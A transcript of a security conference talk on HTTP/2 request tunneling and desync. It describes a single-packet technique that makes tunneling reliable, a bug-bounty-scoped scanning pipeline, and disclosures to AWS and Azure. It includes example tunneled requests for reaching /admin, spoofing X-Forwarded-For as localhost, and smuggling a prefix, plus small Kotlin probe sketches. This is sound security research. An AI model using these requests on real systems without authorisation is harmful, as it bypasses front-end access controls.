
Right, let's go. So, this is some research I've been working on for the best part of too long: about a year, in my spare time between things. It's all about the single-packet shovel: digging for desync-powered request tunneling. If literally none of that makes sense to you, it'll probably be okay. We're going to go through most of it in as much detail as I can fit into the 35 to 40 minutes we have, and if it still doesn't make sense, follow along until the case studies at the end and hopefully have some fun.

Anyway, I'm going to be talking about a bunch of different things today: the breadcrumbs of the research; what request tunneling actually is, specifically with HTTP/2; fixing the existing tunneling detection (there are lots of toolkits out there, and we're going to fix a particular one); something I've coined the 2,000-request problem, which is pretty funny when we come to it; and building custom tooling for your own web security research, if you like that kind of thing, including building a research pipeline. Then we'll go on to some case studies, and, as all good research should be, it's wrapped up with some other things you could try that I think might work.

There are two core references for this entire presentation and paper: "So you want to be a web security researcher?" and a post on building custom research tools, both from PortSwigger. They helped me out a lot with how to actually attempt research for the first time and how to build tools, so both of those blogs are worth a read if you're interested.

So, all good research starts with some breadcrumbs: things you can follow that lead to that feeling of "maybe there's something more here than the industry realizes, something new." For me it started with this. In case nobody recognizes it, it's a ping from a tool called HTTP Request Smuggler that basically says: hey, I think you've got a request smuggling vulnerability, which was popularized relatively recently and can lead to all kinds of nasty things, so you should go and look into it.
I looked into this ping on a bunch of different apps and quickly concluded: nah, it's a false positive. The way this detection works is to cause a delay in the response with a specially crafted HTTP request, and it's pretty prone to false positives, especially these days. As for confirming it, I tried to follow the full methodology and it just wasn't working. Then a couple of days later I got another one, and a couple of days after that a colleague said to me: have you seen this one before? Can you do anything with it? That kept happening, and each time I looked into it I got absolutely nowhere, so I decided it was 100% a false positive and there was nothing you could do about it. As far as I'm aware, that's what everyone else had been doing for quite a long time with this specific ping against certain servers.

However, as is often the case, one of my talented ex-colleagues, Axel, came to me with exactly the same thing, and he'd actually taken it a step further. He'd determined that it wasn't necessarily a false positive: he had some interesting behavior that you might recognize if you're a big HTTP/2 nerd like me. His request basically shows that if you send an HTTP/2 request with both the Content-Length and Transfer-Encoding headers, and a really weird body that just says "foo" with two new lines after it, you get what looks like an HTTP/2 response with an HTTP/1 response inside the response body, which to me made absolutely no sense. It is, in fact, a very strong indication of something called HTTP request tunneling, which we'll cover now. If you ever see an HTTP/2 response with an HTTP/1 response in the body, you've definitely done something weird, and the server is definitely doing something funky.
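To make that concrete, here's roughly what the probe and the weird response looked like. This is a reconstruction from memory rather than the actual slide, using the usual HTTP/2 pseudo-header text convention and a made-up host:

```http
:method: POST
:path: /
:authority: redacted.example
content-length: 7
transfer-encoding: chunked

foo

```

And the response: an outer HTTP/2 response whose body contains an entire HTTP/1.1 response, status line and all:

```http
:status: 200

HTTP/1.1 404 Not Found
Content-Length: 0
```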
So, let's go through what HTTP request tunneling actually looks like, starting with desync attacks. Desync attacks have been popularized over and over and over again by various people at this point, but they all rely on the same thing. Imagine you have a front-end server and a back-end server. In this case we're just using HTTP/1.1, because there are two different ways to represent message length in HTTP: the Content-Length header, on the left-hand side, and the Transfer-Encoding header, on the right-hand side. If you use the Content-Length, this request says that all of the highlighted data is the body: from the 3 all the way down to the example.com Host header. That's pretty simple, right? It's just 50 bytes of data in the request. However, the front end can use the Content-Length while the back end uses the Transfer-Encoding header. The back end's behavior is completely RFC-compliant, by the way: you're supposed to prioritize the Transfer-Encoding header, so the front end is the naughty one here. The back end thinks the entire body is just the x=y: the 0 followed by two new lines represents the end of the body in HTTP/1 for a chunked, transfer-encoded request. That means the extra data at the end, the foo, arrives at the back end as a completely separate request.
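On the page, that classic CL.TE request looks something like this. The exact byte count and the trailing data are illustrative rather than the slide's exact values:

```http
POST / HTTP/1.1
Host: example.com
Content-Length: 50
Transfer-Encoding: chunked

3
x=y
0

foo
```

A front end honoring Content-Length forwards everything after the blank line as one body. A back end honoring Transfer-Encoding reads the 3-byte chunk, sees the 0 chunk as the terminator, and treats the trailing foo as the start of a brand new request.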
So, the front end thinks this is all one big request, and the back end thinks it's two requests. That kind of disagreement between how different servers interpret message lengths in HTTP/1 causes request smuggling and, as we'll now find out, request tunneling. Request smuggling is much, much better known. The main difference with request tunneling is that rather than sharing a single connection between the front end and the back-end application, every client gets their own connection between the front end and the back end. If you don't already know, what front-end servers often do is create so-called keep-alive connections to back-end servers: rather than continually opening new TCP connections, which isn't so much resource-intensive as just slow, they keep the connection alive and send data back and forth on this kind of tunnel between the front end and the back end. In HTTP request smuggling, you have just one line between the front end and the back end, or some pool of connections that all users share. That's really dangerous, because when you leave prefixes, extra data like we saw on the previous slide, on those connections, you can basically influence other people's requests. With request tunneling, however, the architecture is that each client, even if you share the same public IP address, gets their own connection from the front end to the back end. Your requests never go anywhere near any other user's requests, which sounds super secure. And actually, lots of popular front-end servers dynamically switch to this behavior when they detect people trying to do request smuggling, thinking it will save them. Unfortunately, it doesn't. Request tunneling is a vulnerability you can use to exploit exactly this architecture, most easily in cases where you have an HTTP/2 server that downgrades to HTTP/1. You might be thinking, well, no one does that. Actually, most of the web does that.
All the popular front-end servers support HTTP/2, and a lot of the back-end servers are starting to implement HTTP/2 too, but for backward-compatibility reasons they usually run HTTP/1 by default. So your client and the front end are speaking HTTP/2, and your back end is speaking HTTP/1.

So what actually happens, if you're trying to exploit request tunneling, is that as a client you send a request that looks like this. It's an HTTP/2 request, so the Content-Length and Transfer-Encoding headers are completely irrelevant: HTTP/2 has a built-in length mechanism, a field in each frame that just says how big the frame is. These headers are meaningless in HTTP/2; servers could probably just ignore them, but they're kind of kept in for fun. Then you add a 0, which represents the end of a chunked request body in HTTP/1. It doesn't mean that in HTTP/2, but we're pretending it does. And then you have a full request in the body, in this case a GET for some page. The client sends that to the front end. The front end speaks HTTP/2 and says: yeah, that's one full request, no problem. It then flips the language to HTTP/1, converting it from a binary to a plain-text protocol, the details of which you don't really need to know, and forwards it on to the back end as-is.
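Reconstructed from the talk's description rather than the slide itself, with a hypothetical host and illustrative header values, the exploit request looks something like this in HTTP/2 pseudo-header notation:

```http
:method: POST
:path: /
:authority: target.example
content-length: 4
transfer-encoding: chunked

0

GET /some-page HTTP/1.1
Host: target.example
```

After the downgrade, the back end receives the same thing as one plain-text HTTP/1.1 POST whose body happens to contain a chunked terminator followed by a complete GET request.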
You can see the front end is sending all the body data along; it's not leaving anything behind, because it knows that data is all part of the body of the initial request. Now, once it gets to the back end, things get tricky. Now we're talking HTTP/1, so these headers suddenly have a lot of meaning. Let's say, for argument's sake, that the back end chooses to use the Transfer-Encoding header. It knows it's a POST request, so it needs to read the body, and as it reads the data it says: oh, there's chunked encoding, I'll read up to the 0, that's the end of the request. And it therefore thinks that what follows is the start of the next request. So if the back end has two requests, what do you think it does? It responds twice. Why wouldn't it? It's got two requests; they're two separate bits of data. So it responds twice and streams that data back to the front end. The front end, having issued one request to the back end, expects one response from the back end. Seems fairly standard. It treats what comes back as just one big stream of data: it doesn't know there are two responses in there, it just receives a bunch of bytes, goes "okay," and stitches them together. And suddenly you have an HTTP/2 response with an HTTP/1 response in the body of the response, and that gets sent back to the client. You have now successfully tunneled a request past the front end: the back end actually interprets it, but the front end completely ignores it. That doesn't sound particularly dangerous until you start to think about the fact that access control rules can be put in place on the front end, and they now no longer apply, because the request is hidden in the body. Access control rules tend to apply to the request itself, the headers, and not to the body of the request.

So now we know what request tunneling actually is. There's a really, really great tool for detecting it called HTTP Request Smuggler.
It's built by PortSwigger, it's really, really good, and it's where I found these strange pings that for months I sadly dismissed as false positives. It actually has built-in detection for request tunneling, and because I'm just that lazy and don't want to manually check for request tunneling every time I test, I thought: well, what's actually wrong with the detection they have? This is the detection method they're using. It looks very similar to the request I sent that had foo, except it has "bar" and a single line ending at the end of it, I guess representing the method, path and HTTP version: a kind of vaguely invalid HTTP request. But in the cases I was working with, this never, ever produced a nested HTTP response, and therefore the detection just failed. So I gritted my teeth and decided I'd take a look at the Java code behind the tool. It's very simple, as it turns out. There's a scanner file called something like HeadScanTE, presumably "head scan, transfer encoding." On the left you can see there's a string called foobar, which looks like the payload you're supposed to send, and it just gets added to a list or array called attacks. I don't know much Java, but that seems about right. So I just added two new lines to this tool: an attack called foo, which is just "foo" plus two new lines, added to that list of attack methods. Then I ran this new detection method against all the apps that I'd written off as false positives, and it worked 100% of the time. I thought: hey, that's a really easy little novel detection technique. Not amazing, but it's new, it works, and it should hopefully be merged into Request Smuggler very soon.
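For flavor, here's the shape of that tweak. The real tool is Java and I'm paraphrasing from memory, so the names and exact payload bytes below are assumptions, not the actual source:

```kotlin
// Hypothetical sketch of the two-line change: register a second tunneling
// probe alongside the existing one. Names approximate the real tool's.
fun main() {
    val attacks = mutableMapOf<String, String>()
    attacks["vanilla"] = "foo bar\r\n"  // existing probe: vaguely method/path/version shaped
    attacks["foo"] = "foo\r\n\r\n"      // new probe: foo followed by two line endings
    attacks.forEach { (name, payload) ->
        println("$name -> ${payload.encodeToByteArray().size} bytes")
    }
}
```

The only substantive difference is the trailing double line ending, which is what finally coaxed the servers I was looking at into revealing a nested response.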
So now that the detection was working, I figured: hey, let's exploit all these new vulnerabilities I'd found in our customers' environments. However, I quickly ran into a problem that I've called the 2,000-request problem. When doing smuggling, or tunneling even, you'll often find that during detection you instantly get back a tunneled HTTP response; it's really, really quick, really fast, which is great. But the second you try to actually do an exploit, smuggling or tunneling an entire request to the back end, things change. The detection payload is just part of a request, and very invalid; the exploit payload is a whole request. And it would basically take something like 2,000 requests to get one single hit back, which takes a lot of effort. You've got to send that request on the left over and over and over again just to get one valid response back, which is really, really tedious. I got stuck on this for months across all these cases. I kept thinking: what the hell is causing this inconsistency? It made absolutely no sense. And I kind of forgot about it for a while.

Then, on a train heading down to Plymouth, literally to see my parents just down the road, looking out the window at the rain, I decided I'd have a think about it out loud, which must have made me look absolutely mental; I was just repeating these phrases to myself. It takes thousands of requests to get one successful hit: that's weird behavior in itself, since smuggling usually takes tens or hundreds at first. It's completely impractical; it's a lot of data to send. And it's inconsistent, but it's inconsistently inconsistent: sometimes it would take 2,000 requests and sometimes it would take two. It would just suddenly work, and I had no idea what the hell that meant. Now, the astute among you may recognize what this kind of behavior describes: something really, really inconsistent, inconsistently inconsistent, very hard to recreate. And I thought to myself, wow, that sounds like maybe a race condition, but it can't possibly be a race condition, it doesn't make any sense.
It was a race condition. Fortunately for me, web race conditions had just been made incredibly practical that year at DEF CON and Black Hat with something called the single-packet attack. Hence, the single-packet shovel. For those of you who don't know, the single-packet attack basically fixes web race conditions. For a race condition to occur, two requests have to hit the race window at basically the same time; sub-millisecond really, but we'll say millisecond. And all these things get in the way: network latency, jitter, internal latency, dumb bit flips, whoever you pray to, for example. The single-packet attack fixes this by bundling, say, 20 or 30 requests together, sending most of the data while withholding just the last byte of each request, and then sending all of those last bytes in one single packet. The application server is very unlikely to start processing the data until it receives each full request. So with the single-packet attack you remove network latency almost entirely; internal latency is likely to be significantly more consistent, and your race condition windows line up significantly more often, which is very, very useful for exploiting race conditions.
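If you want to see the principle in miniature, here's a sketch of the older HTTP/1.1 "last-byte sync" version of the idea over plain sockets: everything except the final byte goes out early, then all the final bytes are released together. The real single-packet attack does the equivalent with HTTP/2 frames inside one TCP packet, and the host below is hypothetical:

```kotlin
import java.net.Socket

// Last-byte sync sketch: illustrates only the timing trick, not the full
// single-packet attack (which needs HTTP/2 framing and TLS).
fun main() {
    val host = "target.example"  // hypothetical host you are authorised to test
    val body = "x=y"
    val request = "POST / HTTP/1.1\r\nHost: $host\r\n" +
        "Content-Length: ${body.length}\r\nConnection: close\r\n\r\n$body"

    val sockets = (1..20).map { Socket(host, 80).apply { tcpNoDelay = true } }
    // Send everything except the last byte of each request...
    for (s in sockets) {
        s.getOutputStream().write(request.dropLast(1).toByteArray())
        s.getOutputStream().flush()
    }
    Thread.sleep(100)  // let the in-flight data land and settle
    // ...then release all the withheld final bytes as close together as possible.
    for (s in sockets) {
        s.getOutputStream().write(byteArrayOf(request.last().code.toByte()))
        s.getOutputStream().flush()
    }
    sockets.forEach { it.close() }
}
```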
So my solution seemed obvious: let's see if I can use the single-packet attack to make my new detection and exploitation of request tunneling super, super consistent. That's what I went about doing. Fortunately, not only is the single-packet attack relatively simple to understand, just syncing up the timing of requests at the server, it's also extremely trivial to actually implement and use. In Burp, you can add a bunch of requests to a Repeater group, say five requests, put them in a group, and then select "Send group in parallel." So this is what I tested. I took this exploit request, there are just two here but you can imagine having up to 30 of them, each with the attempted tunneled request in the body of the HTTP/2 request, and sent them as a single packet. And instantly I got a successful hit back. That this worked still blows my mind today. So some kind of strange combination of race conditions and request tunneling exists, and I haven't read anything about it anywhere, so I think it's pretty cool and new. As a result, this worked so consistently, maybe 80% consistently, that you only have to try it a few times in a row to get a hit, which is a lot better than sending 2,000 requests. Now you're sending, well, one packet in theory, but 30 requests down a wire.

This made exploitation significantly easier. But my brain, as a tester, as a lazy person, as a researcher, thought: hey, if this works for exploitation, maybe it also works for detection. I'd already improved the detection; maybe I could improve it further by sending everything with the single-packet attack. So, let's build a custom research tool, because one doesn't exist at the moment. Fortunately, as lazy a tester as I am, I'm also a lazy programmer, and I didn't want to build my own tool for scanning lots and lots of targets from scratch. So I went and found one. If you haven't heard of BulkScan, it's behind basically all of PortSwigger's research tools, and it's on GitHub, of course.
It basically allows you to bulk scan things. It lets you select your entire Burp proxy history, regardless of size. Okay, there are some soft limits tied to memory consumption, something like 100,000 requests, but in theory you can select as much data as your RAM will handle. It will then deduplicate similar requests and responses based on keys: if the Server header looks exactly the same, the request path is exactly the same, and the request parameters are exactly the same, we don't need to scan both of those requests, we can just scan one, so it deduplicates that for you. Each scan runs in its own thread, so you don't have to do any of the magic people usually do with threaded tooling, and the thread count is completely customizable. You have a nice powerful laptop and that's all you need; you don't need a huge research machine, you can just whack that thread count way up. You can also combine it with a tool called Distribute Damage, which lets you apply a per-host rate limit, which is really important when you're going to scan the internet; otherwise people get angry at you because you're sending lots and lots of requests per second to one place. Instead you can send, say, 200 requests per second across 200 hosts, then wait five seconds and do it again. That way you also
stay under rate limits, which is really handy. Actually implementing a scan check in BulkScan is also fairly trivial. My idea was to take all the existing permutations from HTTP Request Smuggler. If you don't know what those look like, they're weird, non-RFC-compliant versions of the Content-Length and Transfer-Encoding headers: spaces in weird places, backslashes, things that should be rejected, but HTTP servers love to be helpful and just accept them anyway, and there are lots of different ones out there. So, to actually code this, the only code I really wrote is a little class that overrides the doScan method from BulkScan, and then, for each of the permutations I've written: take the request from the proxy history that you're scanning in this particular thread; apply the permutation, which just means replacing the Transfer-Encoding and Content-Length headers with the permuted header; attempt to send that new exploit request in a single packet; and then go through all the responses from the single-packet attack, and if any of them contain a nested response, report an issue in Burp. That's literally it.
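Here's a standalone paraphrase of the shape of that check. This is not BulkScan's real API: buildProbe, the permutation list, and the host are all illustrative, and in reality the client side speaks HTTP/2, with the downgrade producing the HTTP/1.1 form shown:

```kotlin
// Sketch of the scan logic only. The real tool plugs into BulkScan, which
// handles threading and deduplication, and it fires ~20 copies of each
// probe in a single packet, flagging any response with a nested HTTP/1
// response inside it.
fun buildProbe(host: String, teHeader: String): String {
    val body = "foo\r\n\r\n"
    return "POST / HTTP/1.1\r\n" +
        "Host: $host\r\n" +
        "Content-Length: ${body.length}\r\n" +
        teHeader + "\r\n" +
        "\r\n" +
        body
}

fun main() {
    val permutations = listOf(
        "Transfer-Encoding: chunked",
        "Transfer-Encoding : chunked",  // space before the colon
        "Transfer-Encoding:\tchunked",  // tab instead of a space
        " Transfer-Encoding: chunked"   // leading space
    )
    for (p in permutations) {
        println(buildProbe("target.example", p))  // hypothetical target
    }
}
```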
I'll also mention that, because I struggle with Java, I took BulkScan, imported it into a kind of template, and rewrote the glue in Kotlin, which is basically a very Pythonic version of Java in a sense. That means if you go to my GitHub, you can build research tools where you just get dropped into this class and interact with the Burp Montoya API, which is really, really easy. The code on the slide genuinely isn't far off the actual code I wrote. So from there I had a research tool that I thought would be interesting to run against lots and lots of targets. Of course, now I needed lots and lots of targets, and you can't just go scanning the internet in general. Well, you can, but it's pretty malicious, and it could trigger things that shouldn't be triggered. So what can I legally target? Well, bug bounty seemed like a good start.
This is a common technique. You take a bug bounty scope tool, which will pull all the scopes from HackerOne, Bugcrowd, Intigriti, however it's pronounced, and a couple of other big platforms, and dump them into a spreadsheet. And if you're being kind, like I was, you go through the hundreds and hundreds of entries manually and check whether they allow automated scanning. Lots of them don't. Yeah, that took a long time. Once you have a list of scopes you're actually allowed to scan, you can take some DNS data. I think Rapid7's Project Sonar has a database of every known host name ever, but I don't have access to that; I think you have to email them and very nicely say you're doing a research project, and apparently what I wrote wasn't very good. But there is an open dataset from Project Discovery, who provide DNS databases with all this data. So I took around five million domains from that huge pile of DNS data, mapped them against my scopes, and checked how many of them were actually alive and running HTTP, which came to about 150,000 live domains that I'm legally allowed to attempt hacking and automation against. Then I pumped them into one massive Burp file that I could run my tool against. And then you select everything in the proxy and hit scan.
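The scope-matching step is simple enough to sketch. The file names here are made up, and the real pipeline also probed which hosts were alive before loading them into Burp:

```kotlin
import java.io.File

// Filter a large DNS dump down to hosts that fall inside bug bounty scopes.
// scopes.txt holds one scope domain per line; dns_dump.txt holds candidates.
fun main() {
    val scopes = File("scopes.txt").readLines()
        .map { it.trim().lowercase() }
        .filter { it.isNotEmpty() }
    File("dns_dump.txt").useLines { lines ->
        lines.map { it.trim().lowercase() }
            .filter { host -> scopes.any { host == it || host.endsWith(".$it") } }
            .forEach(::println)  // in-scope hosts, ready for liveness probing
    }
}
```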
Then you pray. And I got some hits, and then I got some more hits, and I was like: this works. And it really did. I'm making good time, this is good. I got a ton of cases; so many that by the time I had reported to the two key vendors involved, which I did as early in the process as I could, I ran out of time to test them all for interesting things. Request tunneling is really tricky to exploit, but I've got some examples for you, to try and hammer home the idea that this really can lead to some very bad things. As for the tooling, I'll come back to that in a sec.
So, we have a research pipeline. We have a ton of cases on legally actionable targets. We have some novel techniques using the single-packet attack to trigger request tunneling. What can we do, and who was actually impacted? Like I said, there were two key vendors that would either be the front end or show the same kind of back-end behavior, and fortunately for me they were quite interesting ones. The first was Amazon Web Services. Amazon's Application Load Balancer does HTTP/2-to-HTTP/1 downgrading by default, and when attacked with a single packet it flips into a kind of "I'm receiving a lot of requests" mode and chunks all the data it's receiving.
It still does this even after the fix, and I don't really know why; I've asked, and they never respond to that part of my email. Regardless, this example is from a real public site that I actually managed to exploit. They didn't care much, but I think it's a great example. Imagine we're sending a GET request to the admin panel, which obviously I'm not supposed to have access to, and I can see that the AWS load balancer is getting in the way, saying: no, you're going to /admin, I'm going to redirect you away. Error, bad, done. Don't go that way. And that's totally fine. But of course, with request tunneling, since the rule applies to the encapsulating request, so to speak, I'm not sending a request to /admin. I'm sending a request to the homepage, and I'm tunneling a request to the admin panel. When you do this, Amazon's Application Load Balancer looks at the request and goes: okay, no request to /admin, that's fine, forward the data. All the stuff we just talked about with request tunneling and the single-packet attack happens, and you get a 404 response with the admin panel inside the body of the response.
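Reconstructed rather than copied from the slide, with a redacted host, the tunneled request looked roughly like this:

```http
:method: POST
:path: /
:authority: redacted.example
content-length: 4
transfer-encoding: chunked

0

GET /admin HTTP/1.1
Host: redacted.example
```

The ALB sees only the outer POST to the homepage, so its /admin redirect rule never fires; the back end sees two requests and answers both, and the second answer, the admin panel, comes back nested in the body of the outer response.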
Of course, you can't render it; you just have to interact with it over and over again. And you can do all kinds of dangerous things, because you're completely bypassing the access controls they've put in place on the front end, which is good fun.

Additionally, that isn't the only kind of access control you can put in place on a front end, though it is the most common one: you set a path you don't want people to reach, and you assume the front end is enough to protect it, and tunneling just totally bypasses those rules. Front ends also rewrite headers for you, so this next one's a little more complicated. Imagine this pseudocode is running on the back end for the /admin route. It says: when a request arrives, if the X-Forwarded-For header is set to localhost, which would mean someone locally sat at the machine the server is physically on, so probably someone with highly privileged access, then return the template, the actual admin page; otherwise, for any other value, respond with a 403. It's a kind of access control that says: if someone is visiting from the app server itself, give them the admin panel; if you're coming from any other IP address, you can't access it.
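In Kotlin, a paraphrase of that back-end pseudocode might look like this; it's purely illustrative, not code from any real target:

```kotlin
// Back-end /admin handler that trusts the front end to have set
// X-Forwarded-For to the true client address.
fun handleAdmin(headers: Map<String, String>): String =
    if (headers["X-Forwarded-For"] == "localhost") {
        "admin.html"     // request appears to come from the box itself
    } else {
        "403 Forbidden"  // everyone else is rejected
    }

fun main() {
    println(handleAdmin(mapOf("X-Forwarded-For" to "203.0.113.7")))  // 403 Forbidden
    println(handleAdmin(mapOf("X-Forwarded-For" to "localhost")))    // admin.html
}
```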
By the way, this is an important point: the X-Forwarded-For header is added by front ends to say "this is the public IP the request originated from." So if I request something, it will contain my public IP, and you can do things like tracking people with it. So when you send a request like this from the client, the front end adds the X-Forwarded-For header with my public IP address (this one's random, not really mine). The back end receives that, runs the code, and returns a 403, since the X-Forwarded-For header added by the front end does not equal localhost. Okay, that seems like a pretty secure pattern for the most part: the X-Forwarded-For header represents the public IP, and the back end just checks it and says, "you're not coming from the box itself, I'm going to reject the request." Now, if you're a pentester, or just maybe slightly creatively minded, you're thinking: can't I just add my own X-Forwarded-For header as a client? And you can. So I send a request like this as a client and say, "hey, I'm coming from localhost, trust me, it's fine." The front end goes, "no, you're not," and it rewrites the header. It does this by searching through the headers of the HTTP/2 request and overwriting that header, no matter what value you give it.
Now, of course, while the header gets rewritten in the headers, there's one place where it doesn't get rewritten. So with request tunneling, what I can do is send a request like this, with the X-Forwarded-For: localhost value set inside the tunneled request. The front end goes, "hey, I'm going to add my X-Forwarded-For header to your headers and pass it on to the back end," but the copy in the body gets left completely untouched. So it reaches the back end, and you get access to the admin panel. Both of those patterns basically bypass front-end access controls.
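Again reconstructed rather than lifted from the slide, the trick looks like this. The front end rewrites X-Forwarded-For among the outer headers but never looks inside the body:

```http
:method: POST
:path: /
:authority: target.example
content-length: 4
transfer-encoding: chunked

0

GET /admin HTTP/1.1
Host: target.example
X-Forwarded-For: localhost
```

The outer request gets the front end's honest X-Forwarded-For stamped onto it; the inner request, the one the back end actually evaluates against its localhost check, keeps the value I chose.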
Now, you might be thinking: how do you know an application is even using the X-Forwarded-For header? How do you get that information? Well, for one, you can just read documentation; front ends often state the headers they add: the HTTP scheme, X-Forwarded-For, X-Forwarded-Host, X-Forwarded-Port maybe, X-Forwarded-Proto for whether you're using HTTP or HTTPS, all that kind of stuff. But you can also use a tool called Param Miner to just guess headers, and Param Miner actually has an integration with request tunneling: it will guess headers inside the tunneled request and check whether the tunneled response changes, so you can quickly figure out which headers are interesting and then go and poke at the interesting stuff. Of course, that doesn't work when you have to use a single packet for the attack.
So I took a really rubbish version of that logic and stuffed it, like a binary search, into my own tool, which is all public, so if you come across this you can definitely use it. I did manage to get a real case using it, so the tooling absolutely works; I know that for sure. So, other than AWS, what was the other vendor? Oh, sorry, let's not move on too quickly: the AWS fix. AWS were awesome. There's no bounty program for the cloud services, there's just a disclosure program, which is fine. I reported it to them, and they basically immediately communicated some mitigations, which amounted to, I think, turning the ALB's desync protection up to its strictest setting so it parses these requests much more strictly. They deployed some updated documentation and a new mitigation classification, which is cool; it's not credited to me, but it is my fault, so I'm happy about it. And then, in March of this year, they deployed a fix. If you're wondering, the redacted thing in the report we discussed, and they happily let me unredact it. The fix itself is pretty simple: if you now send a request to any AWS Application Load Balancer with a Transfer-Encoding header that has a space before the colon, you just immediately receive a 400-style rejection. It just drops the request.
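Illustratively, the now-rejected probe is any request along these lines, where the only sin is the space before the colon:

```http
POST / HTTP/1.1
Host: alb.example
Content-Length: 7
Transfer-Encoding : chunked

foo

```

In my testing, an ALB answers this immediately with a rejection rather than forwarding anything to the back end.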
As far as I know, that fix has been working ever since, so good job; they were very nice about it. Since the technique worked on AWS, I figured: let's see what else it works on while I'm scanning. And a few of my cases were behind the other vendor, Azure Front Door. I still don't know why this worked; Front Door itself arguably wasn't vulnerable. I could tell it was Azure because the responses had X-Azure-Ref, which is a known Azure header. I had one case where my normal single-packet detection worked, and it actually didn't even require the single packet, which is kind of interesting; but it was also only one server that responded that way. The rest of them were just vulnerable to kind of regular request smuggling instead, which is quite similar. It was connection-locked, so you couldn't affect other users, making it effectively very similar to tunneling: you can only bypass front-end rules, leak headers via the tunnel, and do other fun things. I've not given a full example because it's basically the same as what you just saw, but effectively you send a request that looks a bit like this. Rather than smuggling an entire request, you're just smuggling a prefix, and then you'll receive a bunch of 200s and a 404, and that 404 can be for whatever path or rule you want to hit.
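A sketch of the connection-locked prefix smuggle, again reconstructed with made-up details. The smuggled data ends with a partial request rather than a complete one, so the next request you send down the same connection gets glued onto that prefix:

```http
:method: POST
:path: /
:authority: target.example
content-length: 4
transfer-encoding: chunked

0

GET /admin HTTP/1.1
X-Ignore: x
```

Because the connection is locked to you, only your own follow-up requests complete that prefix, so you can't hit other users; you can only bypass the front end's own rules.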
You again have full control of the request you're sending and avoid any header rewrites, which is also very good. I reported this to MSRC, and they responded with a big letter that kind of boils down to: thanks very much, not urgent, request smuggling isn't a vulnerability on its own. Which is maybe fair: you need a gadget, you need the back end to run some code you can abuse, or the front end to have a rule in place. So I asked for some clarification on what kind of impact would prove it, and I gave them examples, and they just never responded. So this is my public disclosure. It isn't fixed as of last week, when I last checked, so if you want to go hunting for this, feel free; it works with the normal detection techniques. If you want some examples, I have my research file here, and I can show you, if it's still working. You never know, they might have fixed it, but that's just what happens sometimes.

So, let's wrap up as quickly as I can with some key takeaways. Request tunneling is still underrated. It was underrated before and it's still underrated now, and cases of it are hiding away.
It's often blind: you get no response back, or it's just really tricky to exploit because of the 2,000-request problem, but there are ways to get around that. The single-packet attack seems to work well for this. It worked really well on AWS, and it may still work elsewhere; I haven't found other cases yet, but the research tool exists on my GitHub if you wish to use it, along with all the other tooling I built. It might be private right now, but I'll make it public right after this. Building your own research tools for Burp is really not that scary. I thought it would be terrifying, and I'm not a programmer, but thanks to BulkScan you basically just write the scan check and it handles everything else. If you're interested in doing your own research, the two articles I linked at the beginning really are great. But the biggest thing that seemed to work for me: when you follow the breadcrumbs, actually be the one who goes back and says "maybe that false positive is worth looking into more," and then keep pulling the thread. If you do, you'll end up building tons of wacky tools that work and that find you cool cases in cloud services. Like I said, tooling and resources are available on my GitHub.

And finally, as all research should, let's wrap up with some further research ideas. First: browser-powered request tunneling, launching request tunneling from your browser with completely HTTP/2-compliant requests. That's not just a theory; it actually works. I haven't published my write-up so far because I really want to get a working exploit for it, but the detection works, and there are certain servers that just ignore content lengths in ways that allow this kind of tunneling. It's very fun and definitely worth looking into, if you can think about how to build a technique to detect it. Second: it's really easy to go scanning with the single packet applied against other HTTP/2-downgrading-to-HTTP/1 implementations, like AWS and Azure; Google Cloud Platform might be a good next target. Third: further methods to make request tunneling not blind. James Kettle's HEAD technique is great, and for some reason the technique of slightly shortening the request and letting it complete also kind of made request tunneling un-blind, which was super useful. I'm not sure if we have time for any questions, but thank you very much for listening. Check out our blog, check out my blog, and follow me on Twitter and all of this. Thank you very much.
>> Any questions? Yeah. [Inaudible question about running this against another routing layer.]
>> I hope not. I have no idea, actually, whether that routing layer would get in the way completely. I'd guess the packets just get passed through all the different layers, and then depending on where they end up, the first interpretation and the last interpretation would be what matters. So maybe. Good question; not 100% sure. You'd have to go and test it. Let me know.
>> One more. Sorry.
>> With this obviously being on the front end, would you argue that, given most apps nowadays are secure by design, anything that could pose much of a vulnerability would be verified on the back end in a separate way?
>> You would certainly hope so. That's an assumption, but I have learned not to make such assumptions. The very first AWS example I gave is a case of that: a real website on the internet that just trusted the front end. And especially with the header exploit, a lot of servers implicitly trust front-end header rewrites, not necessarily for authentication, but for other critical things. There are some really, really bad examples published by James Kettle, like owning an entire internal network somehow through a rewritten Host header. So yes, I'd hope people do the extra checks on the back end, but in practice they don't, 100% of the time.
>> They also assume the front end is pretty solid because it's from Amazon.
>> Yeah. Cool. One more, go ahead.
>> Are there any options for back ends that run HTTP/2, with all the things?
>> Yeah. It's the downgrading that's the problem. Oh, this is probably a good thing to mention about the fix: use HTTP/2 end to end, 100% of the time. It's becoming a lot more common, as I understand it, though I've heard some comments about CDNs being a bit of a blocker for it. So yes, lots of back ends do now support HTTP/2, and they should use it by default, and so should all of you. Cool. Thanks very much.